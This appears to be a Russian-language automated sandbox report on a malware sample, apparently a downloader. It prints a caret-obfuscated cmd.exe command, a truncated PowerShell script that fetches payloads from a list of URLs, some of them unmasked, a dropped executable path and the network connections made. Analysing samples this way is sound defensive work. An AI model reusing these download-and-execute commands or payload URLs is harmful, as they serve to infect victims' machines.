Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V:^O/C"^s^e^t rk^g^7=A^ h.B:^,[]^YQ^O)dbHKz^p1/Ct^G^I^-xw^y;^}kN^Z^i^0(f^{^E^MWco'8+^m^j^\^=P^sn^g^Uv^$^le^Tr^@^u^S2a&&^f^or %N ^in (^18,43^,2^7^,^59^,6^1^,^5^2,2,59^,^5^8,5^8^,1^,5^7^,17^,^4^...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\mqn.exe
Сетевая активность
Подключается к
- 'tr####atours.com':80
- 'pi####iarondo.si':80
- 'og####usmiechu.pl':80
- 'og####usmiechu.pl':443
- 'as#####ce-charente.fr':80
TCP
Запросы HTTP GET
- http://tr####atours.com/u
- http://pi####iarondo.si/z8cG
- http://og####usmiechu.pl/iubv8v
- http://as#####ce-charente.fr/sfh
UDP
- DNS ASK tr####atours.com
- DNS ASK pi####iarondo.si
- DNS ASK di###arsidi.com
- DNS ASK og####usmiechu.pl
- DNS ASK as#####ce-charente.fr
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:^O/C"^s^e^t rk^g^7=A^ h.B:^,[]^YQ^O)dbHKz^p1/Ct^G^I^-xw^y;^}kN^Z^i^0(f^{^E^MWco'8+^m^j^\^=P^sn^g^Uv^$^le^Tr^@^u^S2a&&^f^or %N ^in (^18,43^,2^7^,^59^,6^1^,^5^2,2,59^,^5^8,5^8^,1^,5^7^,17^,^4^...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $zWC='IUA';$QHY='http://tr####atours.com/u@http://pizzeriarondo.si/z8cG@http://diahmarsidi.com/MPCTKG@http://ogrodyusmiechu.pl/iubv8v@http://assurance-charente.fr/sfh'.Split('@');$aBp=([System....
